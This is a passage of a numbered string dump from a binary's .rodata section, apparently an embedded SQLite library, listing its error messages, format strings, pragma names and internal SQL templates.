  551. .rodata:0x04AF3C blob
  552. .rodata:0x04AF41 null
  553. .rodata:0x04AF46 integer overflow
  554. .rodata:0x04AF57 local time unavailable
  555. .rodata:0x04AF6E sqlite_temp_master
  556. .rodata:0x04AF81 sqlite_master
  557. .rodata:0x04AF8F CAND
  558. .rodata:0x04AF97 ,
  559. .rodata:0x04AF9C %lld
  560. .rodata:0x04AFA1 %!.15g
  561. .rodata:0x04AFA8 -Inf
  562. .rodata:0x04AFAD +Inf
  563. .rodata:0x04AFB2 Inf
  564. .rodata:0x04AFB6 (NULL)
  565. .rodata:0x04AFBD NULL
  566. .rodata:0x04AFC2 NaN
  567. .rodata:0x04AFCA invalid page number %d
  568. .rodata:0x04AFE1 2nd reference to page %d
  569. .rodata:0x04AFFA now
  570. .rodata:0x04AFFE localtime
  571. .rodata:0x04B008 unixepoch
  572. .rodata:0x04B012 utc
  573. .rodata:0x04B016 weekday
  574. .rodata:0x04B01F start of
  575. .rodata:0x04B029 month
  576. .rodata:0x04B02F year
  577. .rodata:0x04B034 day
  578. .rodata:0x04B038 hour
  579. .rodata:0x04B03D minute
  580. .rodata:0x04B044 second
  581. .rodata:0x04B04B LIKE or GLOB pattern too complex
  582. .rodata:0x04B06C ESCAPE expression must be a single character
  583. .rodata:0x04B09B %!.20e
  584. .rodata:0x04B0A2 %02d
  585. .rodata:0x04B0A7 %06.3f
  586. .rodata:0x04B0AE %03d
  587. .rodata:0x04B0B3 %.16g
  588. .rodata:0x04B0B9 %04d
  589. .rodata:0x04B0BE %04d-%02d-%02d %02d:%02d:%02d
  590. .rodata:0x04B0DC %02d:%02d:%02d
  591. .rodata:0x04B0EB %04d-%02d-%02d
  592. .rodata:0x04B0FA %llu
  593. .rodata:0x04B0FF C%llu
  594. .rodata:0x04B105 %s
  595. .rodata:0x04B108 rowid
  596. .rodata:0x04B10E %s:%d
  597. .rodata:0x04B114 vtable constructor failed: %s
  598. .rodata:0x04B132 vtable constructor did not declare schema: %s
  599. .rodata:0x04B160 hidden
  600. .rodata:0x04B167 Chidden
  601. .rodata:0x04B16F USING TEMP B-TREE
  602. .rodata:0x04B182 COMPOUND SUBQUERIES %d AND %d %s(%s)
  603. .rodata:0x04B1A7 USE TEMP B-TREE FOR %s
  604. .rodata:0x04B1BE %s.%s
  605. .rodata:0x04B1C4 column%d
  606. .rodata:0x04B1CD %s.rowid
  607. .rodata:0x04B1D6 name=%Q
  608. .rodata:0x04B1DE %s OR name=%Q
  609. .rodata:0x04B1EC type='trigger' AND (%s)
  610. .rodata:0x04B204 tbl_name=%Q
  611. .rodata:0x04B210 %s%.*s\"%w\"
  612. .rodata:0x04B21B %s%s
  613. .rodata:0x04B220 %.*s\"%w\"%s
  614. .rodata:0x04B22D parser stack overflow
  615. .rodata:0x04B243 no such collation sequence: %s
  616. .rodata:0x04B262 BINARY
  617. .rodata:0x04B269 not authorized
  618. .rodata:0x04B278 authorizer malfunction
  619. .rodata:0x04B28F sqlite_
  620. .rodata:0x04B297 aaa
  621. .rodata:0x04B29B corrupt database
  622. .rodata:0x04B2AC unknown database %T
  623. .rodata:0x04B2C0 object name reserved for internal use: %s
  624. .rodata:0x04B2EA Expression tree is too large (maximum depth %d)
  625. .rodata:0x04B31A no such module: %s
  626. .rodata:0x04B32D view %s is circularly defined
  627. .rodata:0x04B34B no such index: %s
  628. .rodata:0x04B35D too many terms in %s BY clause
  629. .rodata:0x04B37C %r %s BY term out of range - should be between 1 and %d
  630. .rodata:0x04B3B4 default value of column [%s] is not constant
  631. .rodata:0x04B3E1 foreign key on %s should reference only one column of table %T
  632. .rodata:0x04B420 number of columns in foreign key does not match the number of columns in the referenced table
  633. .rodata:0x04B47E unknown column \"%s\" in foreign key definition
  634. .rodata:0x04B4AC %s %T cannot reference objects in database %s
  635. .rodata:0x04B4DA %s cannot use variables
  636. .rodata:0x04B4F2 DISTINCT aggregates must have exactly one argument
  637. .rodata:0x04B525 out of memory
  638. .rodata:0x04B533 table %s: xBestIndex returned an invalid plan
  639. .rodata:0x04B561 %s.xBestIndex() malfunction
  640. .rodata:0x04B57D no query solution
  641. .rodata:0x04B58F ON
  642. .rodata:0x04B592 USING
  643. .rodata:0x04B598 a JOIN clause is required before %s
  644. .rodata:0x04B5BE unknown or unsupported join type: %T %T%s%T
  645. .rodata:0x04B5EA RIGHT and FULL OUTER JOINs are not currently supported
  646. .rodata:0x04B621 table %s may not be modified
  647. .rodata:0x04B63E cannot modify %s because it is a view
  648. .rodata:0x04B664 foreign key mismatch - \"%w\" referencing \"%w\"
  649. .rodata:0x04B691 too many columns in %s
  650. .rodata:0x04B6A8 table %s may not be altered
  651. .rodata:0x04B6C4 duplicate WITH table name: %s
  652. .rodata:0x04B6E2 a GROUP BY clause is required before HAVING
  653. .rodata:0x04B70E ORDER
  654. .rodata:0x04B714 GROUP
  655. .rodata:0x04B71A aggregate functions are not allowed in the GROUP BY clause
  656. .rodata:0x04B755 too many terms in ORDER BY clause
  657. .rodata:0x04B777 %r ORDER BY term does not match any column in the result set
  658. .rodata:0x04B7B4 access to %s.%s.%s is prohibited
  659. .rodata:0x04B7D5 access to %s.%s is prohibited
  660. .rodata:0x04B7F3 no such column
  661. .rodata:0x04B802 ambiguous column name
  662. .rodata:0x04B818 new
  663. .rodata:0x04B81C old
  664. .rodata:0x04B820 misuse of aliased aggregate %s
  665. .rodata:0x04B83F %s: %s.%s.%s
  666. .rodata:0x04B84C %s: %s.%s
  667. .rodata:0x04B856 %s: %s
  668. .rodata:0x04B85D %s prohibited in partial index WHERE clauses
  669. .rodata:0x04B88A functions
  670. .rodata:0x04B894 second argument to likelihood() must be a constant between 0.0 and 1.0
  671. .rodata:0x04B8DB not authorized to use function: %s
  672. .rodata:0x04B8FE misuse of aggregate function %.*s()
  673. .rodata:0x04B922 no such function: %.*s
  674. .rodata:0x04B939 wrong number of arguments to function %.*s()
  675. .rodata:0x04B966 %s prohibited in CHECK constraints
  676. .rodata:0x04B989 subqueries
  677. .rodata:0x04B994 parameters
  678. .rodata:0x04B99F SEARCH
  679. .rodata:0x04B9A6 SCAN
  680. .rodata:0x04B9AB %s USING AUTOMATIC %sINDEX%.0s%s
  681. .rodata:0x04B9CC %s USING %sINDEX %s%s
  682. .rodata:0x04B9E2 COVERING
  683. .rodata:0x04B9EC %s SUBQUERY %d
  684. .rodata:0x04B9FB %s TABLE %s
  685. .rodata:0x04BA07 %s AS %s
  686. .rodata:0x04BA10 C(
  687. .rodata:0x04BA15 ANY(
  688. .rodata:0x04BA20 %s USING INTEGER PRIMARY KEY
  689. .rodata:0x04BA3D %s (rowid=?)
  690. .rodata:0x04BA4A %s (rowid>? AND rowid<?)
  691. .rodata:0x04BA63 %s (rowid>?)
  692. .rodata:0x04BA70 %s (rowid<?)
  693. .rodata:0x04BA7D %s VIRTUAL TABLE INDEX %d:%s
  694. .rodata:0x04BA9A FOREIGN KEY constraint failed
  695. .rodata:0x04BAB8 misuse at line %d of [%.10s]
  696. .rodata:0x04BAD5 unable to delete/modify collation sequence due to active statements
  697. .rodata:0x04BB19 unable to delete/modify user-function due to active statements
  698. .rodata:0x04BB58 cannot open file at line %d of [%.10s]
  699. .rodata:0x04BB7F cannot limit WAL size: %s
  700. .rodata:0x04BB99 database corruption at line %d of [%.10s]
  701. .rodata:0x04BBC3 malformed database schema (%s)
  702. .rodata:0x04BBE2 %s - %s
  703. .rodata:0x04BBEA failed memory resize %u to %u bytes
  704. .rodata:0x04BC0E failed to allocate %u bytes of memory
  705. .rodata:0x04BC34 attempt to open \"%s\" as file descriptor %d
  706. .rodata:0x04BC5F /dev/null
  707. .rodata:0x04BC69 os_unix.c:%d: (%d) %s(%s) - %s
  708. .rodata:0x04BC88 mremap
  709. .rodata:0x04BC8F mmap
  710. .rodata:0x04BC94 close
  711. .rodata:0x04BC9A /dev/urandom
  712. .rodata:0x04BCA7 full_fsync
  713. .rodata:0x04BCB2 ftruncate
  714. .rodata:0x04BCBC unlink
  715. .rodata:0x04BCC3 fsync
  716. .rodata:0x04BCC9 open
  717. .rodata:0x04BCCE getcwd
  718. .rodata:0x04BCD5 /%s
  719. .rodata:0x04BCD9 cannot fstat db file %s
  720. .rodata:0x04BCF1 file unlinked while open: %s
  721. .rodata:0x04BD0E multiple links to file: %s
  722. .rodata:0x04BD29 file renamed while open: %s
  723. .rodata:0x04BD45 API call with %s database connection pointer
  724. .rodata:0x04BD72 invalid
  725. .rodata:0x04BD7A unopened
  726. .rodata:0x04BD83 API called with NULL prepared statement
  727. .rodata:0x04BDAB API called with finalized prepared statement
  728. .rodata:0x04BDD8 bind on a busy prepared statement: [%s]
  729. .rodata:0x04BE00 recovered %d frames from WAL file %s
  730. .rodata:0x04BE25 unknown database: %s
  731. .rodata:0x04BE3A unable to use function %s in the requested context
  732. .rodata:0x04BE6D %.*f
  733. .rodata:0x04BE72 sqlite3_get_table() called with two or more incompatible queries
  734. .rodata:0x04BEB3 sqlite3_extension_init
  735. .rodata:0x04BECA so
  736. .rodata:0x04BECD unable to open shared library [%s]
  737. .rodata:0x04BEF0 sqlite3_
  738. .rodata:0x04BEF9 lib
  739. .rodata:0x04BEFD _init
  740. .rodata:0x04BF03 no entry point [%s] in shared library [%s]
  741. .rodata:0x04BF2E error during initialization: %s
  742. .rodata:0x04BF4E %s-shm
  743. .rodata:0x04BF55 readonly_shm
  744. .rodata:0x04BF62 write
  745. .rodata:0x04BF68 access
  746. .rodata:0x04BF6F cache
  747. .rodata:0x04BF75 file:
  748. .rodata:0x04BF7B localhost
  749. .rodata:0x04BF85 invalid uri authority: %.*s
  750. .rodata:0x04BFA1 vfs
  751. .rodata:0x04BFA5 mode
  752. .rodata:0x04BFAA no such %s mode: %s
  753. .rodata:0x04BFBE %s mode not allowed: %s
  754. .rodata:0x04BFD6 no such vfs: %s
  755. .rodata:0x04BFE6 recovered %d pages from %s
  756. .rodata:0x04C001 :memory:
  757. .rodata:0x04C00A unable to open a temporary database file for storing temporary tables
  758. .rodata:0x04C050 at most %d tables in a join
  759. .rodata:0x04C06C automatic index on %s(%s)
  760. .rodata:0x04C086 auto-index
  761. .rodata:0x04C091 DISTINCT
  762. .rodata:0x04C09A GROUP BY
  763. .rodata:0x04C0A3 CUSING COVERING INDEX
  764. .rodata:0x04C0BA only a single result allowed for a SELECT that is part of an expression
  765. .rodata:0x04C102 SCAN TABLE %s%s%s
  766. .rodata:0x04C114 min
  767. .rodata:0x04C118 max
  768. .rodata:0x04C11C ORDER BY
  769. .rodata:0x04C125 CORRELATED
  770. .rodata:0x04C131 LIST
  771. .rodata:0x04C136 SCALAR
  772. .rodata:0x04C13D EXECUTE %s%s SUBQUERY %d
  773. .rodata:0x04C156 misuse of aggregate: %s()
  774. .rodata:0x04C170 unknown function: %.*s()
  775. .rodata:0x04C189 RAISE() may only be used within a trigger-program
  776. .rodata:0x04C1BB NOCASE
  777. .rodata:0x04C1C2 match
  778. .rodata:0x04C1C8 ORDER BY clause should come after %s not before
  779. .rodata:0x04C1F8 LIMIT clause should come after %s not before
  780. .rodata:0x04C225 all VALUES must have the same number of terms
  781. .rodata:0x04C253 SELECTs to the left and right of %s do not have the same number of result columns
  782. .rodata:0x04C2A5 unknown database %s
  783. .rodata:0x04C2B9 source and destination must be distinct
  784. .rodata:0x04C2E1 Failed to read ptrmap key=%d
  785. .rodata:0x04C2FE Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
  786. .rodata:0x04C334 %d of %d pages missing from overflow list starting at %d
  787. .rodata:0x04C36D failed to get page %d
  788. .rodata:0x04C383 freelist leaf count too big on page %d
  789. .rodata:0x04C3AA Page %d:
  790. .rodata:0x04C3B4 unable to get the page. error code=%d
  791. .rodata:0x04C3DA btreeInitPage() returns error code %d
  792. .rodata:0x04C400 On tree page %d cell %d:
  793. .rodata:0x04C41A Rowid %lld out of order (previous was %lld)
  794. .rodata:0x04C446 Child page depth differs
  795. .rodata:0x04C45F On page %d at right child:
  796. .rodata:0x04C47B Rowid %lld out of order (max larger than parent min of %lld)
  797. .rodata:0x04C4B8 Rowid %lld out of order (min less than parent min of %lld)
  798. .rodata:0x04C4F3 Rowid %lld out of order (max larger than parent max of %lld)
  799. .rodata:0x04C530 Rowid %lld out of order (min less than parent max of %lld)
  800. .rodata:0x04C56B Corruption detected in cell %d on page %d
  801. .rodata:0x04C595 Multiple uses for byte %d of page %d
  802. .rodata:0x04C5BA Fragmentation of %d bytes reported as %d on page %d
  803. .rodata:0x04C5EE unable to close due to unfinalized statements or unfinished backups
  804. .rodata:0x04C632 temporary storage cannot be changed from within a transaction
  805. .rodata:0x04C670 cannot detach database %s
  806. .rodata:0x04C68A cannot DETACH database within transaction
  807. .rodata:0x04C6B4 database %s is locked
  808. .rodata:0x04C6CA no such database: %s
  809. .rodata:0x04C6DF @
  810. .rodata:0x04C6E3 %s-mjXXXXXX9XXz
  811. .rodata:0x04C6F3 MJ delete: %s
  812. .rodata:0x04C701 MJ collide: %s
  813. .rodata:0x04C710 -mj%06X9%02X
  814. .rodata:0x04C71D cannot commit - no transaction is active
  815. .rodata:0x04C746 cannot start a transaction within a transaction
  816. .rodata:0x04C776 cannot rollback - no transaction is active
  817. .rodata:0x04C7A1 into
  818. .rodata:0x04C7A6 out of
  819. .rodata:0x04C7AD ATTACH ':memory:' AS vacuum_db;
  820. .rodata:0x04C7CD ATTACH '' AS vacuum_db;
  821. .rodata:0x04C7E5 %s constraint failed: %s
  822. .rodata:0x04C7FE %s constraint failed
  823. .rodata:0x04C813 abort at %d in [%s]: %s
  824. .rodata:0x04C82B cannot open savepoint - SQL statements in progress
  825. .rodata:0x04C85E cannot release savepoint - SQL statements in progress
  826. .rodata:0x04C894 cannot commit transaction - SQL statements in progress
  827. .rodata:0x04C8CB database schema has changed
  828. .rodata:0x04C8E7 SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
  829. .rodata:0x04C927 Main freelist:
  830. .rodata:0x04C937 List of tree roots:
  831. .rodata:0x04C94C Page %d is never used
  832. .rodata:0x04C962 Pointer map page %d is referenced
  833. .rodata:0x04C984 Outstanding page count goes from %d to %d during this analysis
  834. .rodata:0x04C9C3 too many levels of trigger recursion
  835. .rodata:0x04C9E8 cannot change %s wal mode from within a transaction
  836. .rodata:0x04CA1C cannot VACUUM from within a transaction
  837. .rodata:0x04CA44 cannot VACUUM - SQL statements in progress
  838. .rodata:0x04CA6F PRAGMA vacuum_db.synchronous=OFF
  839. .rodata:0x04CA90 BEGIN;
  840. .rodata:0x04CA97 SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
  841. .rodata:0x04CB2B SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14)FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
  842. .rodata:0x04CB93 SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
  843. .rodata:0x04CC09 SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
  844. .rodata:0x04CCCD SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
  845. .rodata:0x04CD3E SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
  846. .rodata:0x04CDD9 INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sqlFROM main.sqlite_master WHERE type='view' OR type='trigger'OR (type='table' AND rootpage=0)
  847. .rodata:0x04CE91 database table is locked: %s
  848. .rodata:0x04CEAE --
  849. .rodata:0x04CEB2 '%.*q'
  850. .rodata:0x04CEB9 zeroblob(%d)
  851. .rodata:0x04CEC6 x'
  852. .rodata:0x04CEC9 %02x
  853. .rodata:0x04CECE statement aborts at %d: [%s] %s
  854. .rodata:0x04CEEE interrupted
  855. .rodata:0x04CEFA no such savepoint: %s
  856. .rodata:0x04CF10 nil
  857. .rodata:0x04CF16 (blob)
  858. .rodata:0x04CF1D k(%d
  859. .rodata:0x04CF22 ,...
  860. .rodata:0x04CF27 (%.20s)
  861. .rodata:0x04CF2F %s(%d)
  862. .rodata:0x04CF36 vtab:%p:%p
  863. .rodata:0x04CF41 intarray
  864. .rodata:0x04CF4A program
  865. .rodata:0x04CF52 %.2x
  866. .rodata:0x04CF57 sqlite_stat1
  867. .rodata:0x04CF64 SELECT tbl,idx,stat FROM %Q.sqlite_stat1
  868. .rodata:0x04CF8D attached databases must use the same text encoding as main database
  869. .rodata:0x04CFD1 unsupported file format
  870. .rodata:0x04CFE9 SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
  871. .rodata:0x04D020 temporary table name must be unqualified
  872. .rodata:0x04D049 table %T already exists
  873. .rodata:0x04D061 there is already an index named %s
  874. .rodata:0x04D084 sqlite_sequence
  875. .rodata:0x04D094 no such view
  876. .rodata:0x04D0A1 no such table
  877. .rodata:0x04D0B1 multiple references to recursive table: %s
  878. .rodata:0x04D0DC circular reference: %s
  879. .rodata:0x04D0F3 table %s has %d values for %d columns
  880. .rodata:0x04D119 multiple recursive references: %s
  881. .rodata:0x04D13B recursive reference in a subquery: %s
  882. .rodata:0x04D161 sqlite_sq_%p
  883. .rodata:0x04D16E too many references to \"%s\": max 65535
  884. .rodata:0x04D195 a NATURAL join may not have an ON or USING clause
  885. .rodata:0x04D1C7 cannot have both ON and USING clauses in the same join
  886. .rodata:0x04D1FE cannot join using column %s - column not present in both tables
  887. .rodata:0x04D23E %s.%s.%s
  888. .rodata:0x04D247 no such table: %s
  889. .rodata:0x04D259 no tables specified
  890. .rodata:0x04D26D too many columns in result set
  891. .rodata:0x04D28C no such column: %s
  892. .rodata:0x04D29F _rowid_
  893. .rodata:0x04D2A7 rows updated
  894. .rodata:0x04D2B4 -- TRIGGER %s
  895. .rodata:0x04D2C2 oid
  896. .rodata:0x04D2C6 rows deleted
  897. .rodata:0x04D2D3 table %S has no column named %s
  898. .rodata:0x04D2F3 table %S has %d columns but %d values were supplied
  899. .rodata:0x04D327 %d values for %d columns
  900. .rodata:0x04D340 rows inserted
  901. .rodata:0x04D34E normal
  902. .rodata:0x04D355 exclusive
  903. .rodata:0x04D35F -%T
  904. .rodata:0x04D363 result
  905. .rodata:0x04D36A cache_size
  906. .rodata:0x04D375 page_size
  907. .rodata:0x04D37F secure_delete
  908. .rodata:0x04D38D locking_mode
  909. .rodata:0x04D39A journal_mode
  910. .rodata:0x04D3A7 journal_size_limit
  911. .rodata:0x04D3BA auto_vacuum
  912. .rodata:0x04D3C6 full
  913. .rodata:0x04D3CB incremental
  914. .rodata:0x04D3D7 mmap_size
  915. .rodata:0x04D3E1 temp_store
  916. .rodata:0x04D3EC file
  917. .rodata:0x04D3F1 memory
  918. .rodata:0x04D3F8 temp_store_directory
  919. .rodata:0x04D40D not a writable directory
  920. .rodata:0x04D426 synchronous
  921. .rodata:0x04D432 Safety level may not be changed inside a transaction
  922. .rodata:0x04D467 cid
  923. .rodata:0x04D46B type
  924. .rodata:0x04D470 notnull
  925. .rodata:0x04D478 dflt_value
  926. .rodata:0x04D483 pk
  927. .rodata:0x04D486 table
  928. .rodata:0x04D48C index
  929. .rodata:0x04D492 width
  930. .rodata:0x04D498 height
  931. .rodata:0x04D49F seqno
  932. .rodata:0x04D4A5 seq
  933. .rodata:0x04D4A9 unique
  934. .rodata:0x04D4B0 id
  935. .rodata:0x04D4B3 from
  936. .rodata:0x04D4B8 to
  937. .rodata:0x04D4BB on_update
  938. .rodata:0x04D4C5 on_delete
  939. .rodata:0x04D4CF NONE
  940. .rodata:0x04D4D4 parent
  941. .rodata:0x04D4DB fkid
  942. .rodata:0x04D4E0 like
  943. .rodata:0x04D4E5 glob
  944. .rodata:0x04D4EA integrity_check
  945. .rodata:0x04D4FA *** in database %s ***\n
  946. .rodata:0x04D512 row
  947. .rodata:0x04D517 Cmissing from index
  948. .rodata:0x04D52C wrong # of entries in index
  949. .rodata:0x04D549 ok
  950. .rodata:0x04D54C encoding
  951. .rodata:0x04D555 unsupported encoding: %s
  952. .rodata:0x04D56E compile_option
  953. .rodata:0x04D57D restart
  954. .rodata:0x04D585 busy
  955. .rodata:0x04D58A log
  956. .rodata:0x04D58E checkpointed
  957. .rodata:0x04D59B wal_autocheckpoint
  958. .rodata:0x04D5AE timeout
  959. .rodata:0x04D5B6 soft_heap_limit
  960. .rodata:0x04D5C6 BEFORE
  961. .rodata:0x04D5CD AFTER
  962. .rodata:0x04D5D3 BEGIN
  963. .rodata:0x04D5D9 COMMIT
  964. .rodata:0x04D5E0 ROLLBACK
  965. .rodata:0x04D5E9 unknown table option: %.*s
  966. .rodata:0x04D604 too many columns on %s
  967. .rodata:0x04D61B duplicate column name: %s
  968. .rodata:0x04D635 parameters are not allowed in views
  969. .rodata:0x04D659 view
  970. .rodata:0x04D65E too many terms in compound SELECT
  971. .rodata:0x04D680 set list
  972. .rodata:0x04D689 near \"%T\": syntax error
  973. .rodata:0x04D6A1 variable number must be between ?1 and ?%d
  974. .rodata:0x04D6CC too many SQL variables
  975. .rodata:0x04D6E3 too many arguments on function %T
  976. .rodata:0x04D705 no such index: %S
  977. .rodata:0x04D717 index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
  978. .rodata:0x04D760 DELETE FROM %Q.%s WHERE name=%Q AND type='index'
  979. .rodata:0x04D791 idx
  980. .rodata:0x04D795 INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
  981. .rodata:0x04D7D5 type='trigger' AND name='%q'
  982. .rodata:0x04D7F2 temporary trigger may not have qualified name
  983. .rodata:0x04D820 cannot create triggers on virtual tables
  984. .rodata:0x04D849 trigger %T already exists
  985. .rodata:0x04D863 cannot create trigger on system table
  986. .rodata:0x04D889 cannot create %s trigger on view: %S
  987. .rodata:0x04D8AE cannot create INSTEAD OF trigger on table: %S
  988. .rodata:0x04D8DC qualified table names are not allowed on INSERT, UPDATE, and DELETE statements within triggers
  989. .rodata:0x04D93B the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
  990. .rodata:0x04D98F the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
  991. .rodata:0x04D9E4 no such trigger: %S
  992. .rodata:0x04D9F8 unable to identify the object to be reindexed
  993. .rodata:0x04DA26 there is already another table or index with this name: %s
  994. .rodata:0x04DA61 view %s may not be altered
  995. .rodata:0x04DA7C UPDATE \"%w\".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
  996. .rodata:0x04DAC1 UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
  997. .rodata:0x04DC41 UPDATE \"%w\".sqlite_sequence set name = %Q WHERE name = %Q
  998. .rodata:0x04DC7B UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
  999. .rodata:0x04DCD7 Cannot add a PRIMARY KEY column
  1000. .rodata:0x04DCF7 Cannot add a UNIQUE column
  1001. .rodata:0x04DD12 Cannot add a REFERENCES column with non-NULL default value
  1002. .rodata:0x04DD4D Cannot add a NOT NULL column with default value NULL
  1003. .rodata:0x04DD82 Cannot add a column with non-constant default
  1004. .rodata:0x04DDB0 UPDATE \"%w\".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
  1005. .rodata:0x04DE1D virtual tables may not be altered
  1006. .rodata:0x04DE3F Cannot add a column to a view
  1007. .rodata:0x04DE5D sqlite_altertab_%s
  1008. .rodata:0x04DE70 interrupt
  1009. .rodata:0x04DE7A unrecognized token: \"%T\"
  1010. .rodata:0x04DE93 sqlite_stat%d
  1011. .rodata:0x04DEA1 DELETE FROM %Q.%s WHERE %s=%Q
  1012. .rodata:0x04DEBF UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
  1013. .rodata:0x04DEF7 sqlite_stat
  1014. .rodata:0x04DF03 table %s may not be dropped
  1015. .rodata:0x04DF1F use DROP TABLE to delete table %s
  1016. .rodata:0x04DF41 use DROP VIEW to delete view %s
  1017. .rodata:0x04DF61 tbl
  1018. .rodata:0x04DF65 DELETE FROM %Q.sqlite_sequence WHERE name=%Q
  1019. .rodata:0x04DF92 DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
  1020. .rodata:0x04DFCA CUNIQUE
  1021. .rodata:0x04DFD2 cannot create a TEMP index on non-TEMP table \"%s\"
  1022. .rodata:0x04E004 altertab_
  1023. .rodata:0x04E00E table %s may not be indexed
  1024. .rodata:0x04E02A views may not be indexed
  1025. .rodata:0x04E043 virtual tables may not be indexed
  1026. .rodata:0x04E065 there is already a table named %s
  1027. .rodata:0x04E087 index %s already exists
  1028. .rodata:0x04E09F sqlite_autoindex_%s_%d
  1029. .rodata:0x04E0B6 table %s has no column named %s
  1030. .rodata:0x04E0D6 conflicting ON CONFLICT clauses specified
  1031. .rodata:0x04E100 CREATE%s INDEX %.*s
  1032. .rodata:0x04E114 INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
  1033. .rodata:0x04E144 name='%q' AND type='index'
  1034. .rodata:0x04E15F table \"%s\" has more than one primary key
  1035. .rodata:0x04E188 AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
  1036. .rodata:0x04E1C0 TABLE
  1037. .rodata:0x04E1C6 VIEW
  1038. .rodata:0x04E1CB \n)
  1039. .rodata:0x04E1CE ,\n
  1040. .rodata:0x04E1D3 \n
  1041. .rodata:0x04E1D7 AUTOINCREMENT not allowed on WITHOUT ROWID tables
  1042. .rodata:0x04E209 PRIMARY KEY missing on table %s
  1043. .rodata:0x04E229 CREATE TABLE
  1044. .rodata:0x04E237 CREATE %s %.*s
  1045. .rodata:0x04E246 UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
  1046. .rodata:0x04E29D CREATE TABLE %Q.sqlite_sequence(name,seq)
  1047. .rodata:0x04E2C7 tbl_name='%q' AND type!='trigger'
  1048. .rodata:0x04E2E9 CREATE TABLE %Q.%s(%s)
  1049. .rodata:0x04E300 CREATE VIRTUAL TABLE %T
  1050. .rodata:0x04E318 UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
  1051. .rodata:0x04E370 name='%q' AND type='table'
  1052. .rodata:0x04E38B database schema is locked: %s
  1053. .rodata:0x04E3A9 statement too long
  1054. .rodata:0x04E3BC invalid rootpage
  1055. .rodata:0x04E3CD too many attached databases - max %d
  1056. .rodata:0x04E3F2 cannot ATTACH database within transaction
  1057. .rodata:0x04E41C database %s is already in use
  1058. .rodata:0x04E43A database is already attached
  1059. .rodata:0x04E457 unable to open database: %s
  1060. .rodata:0x04E473 cannot open value of type %s
  1061. .rodata:0x04E490 no such rowid: %lld
  1062. .rodata:0x04E4A4 foreign key
  1063. .rodata:0x04E4B0 indexed
  1064. .rodata:0x04E4B8 cannot open virtual table: %s
  1065. .rodata:0x04E4D6 cannot open table without rowid: %s
  1066. .rodata:0x04E4FA cannot open view: %s
  1067. .rodata:0x04E50F no such column: \"%s\"
  1068. .rodata:0x04E524 cannot open %s column for writing
  1069. .rodata:0x04E546 SQLITE_TMPDIR
  1070. .rodata:0x04E554 TMPDIR
  1071. .rodata:0x04E55B %s/etilqs_
  1072. .rodata:0x04E566 psow
  1073. .rodata:0x04E56B unix-excl
  1074. .rodata:0x04E575 %s.lock
  1075. .rodata:0x04E57D RTRIM
  1076. .rodata:0x04E583 main
  1077. .rodata:0x04E588 MATCH
  1078. .rodata:0x04E58E automatic extension loading failed: %s
  1079. .rodata:0x04E5B5 unix
  1080. .rodata:0x04E5BA unix-none
  1081. .rodata:0x04E5C4 unix-dotfile
  1082. .rodata:0x04E5D1 stat
  1083. .rodata:0x04E5D6 fstat
  1084. .rodata:0x04E5DC fcntl
  1085. .rodata:0x04E5E2 read
  1086. .rodata:0x04E5E7 pread
  1087. .rodata:0x04E5ED pread64
  1088. .rodata:0x04E5F5 pwrite
  1089. .rodata:0x04E5FC pwrite64
  1090. .rodata:0x04E605 fchmod
  1091. .rodata:0x04E60C fallocate
  1092. .rodata:0x04E616 openDirectory
  1093. .rodata:0x04E624 mkdir
  1094. .rodata:0x04E62A rmdir
  1095. .rodata:0x04E630 fchown
  1096. .rodata:0x04E637 munmap
  1097. .rodata:0x04E63E /var/tmp
  1098. .rodata:0x04E647 /usr/tmp
  1099. .rodata:0x04E650 /tmp
  1100. .rodata:0x04E655 not an error
  1101. .rodata:0x04E662 SQL logic error or missing database
  1102. .rodata:0x04E686 access permission denied
  1103. .rodata:0x04E69F callback requested query abort
  1104. .rodata:0x04E6BE database is locked
  1105. .rodata:0x04E6D1 database table is locked
  1106. .rodata:0x04E6EA attempt to write a readonly database
  1107. .rodata:0x04E70F disk I/O error
  1108. .rodata:0x04E71E database disk image is malformed
  1109. .rodata:0x04E73F unknown operation
  1110. .rodata:0x04E751 database or disk is full
  1111. .rodata:0x04E76A unable to open database file
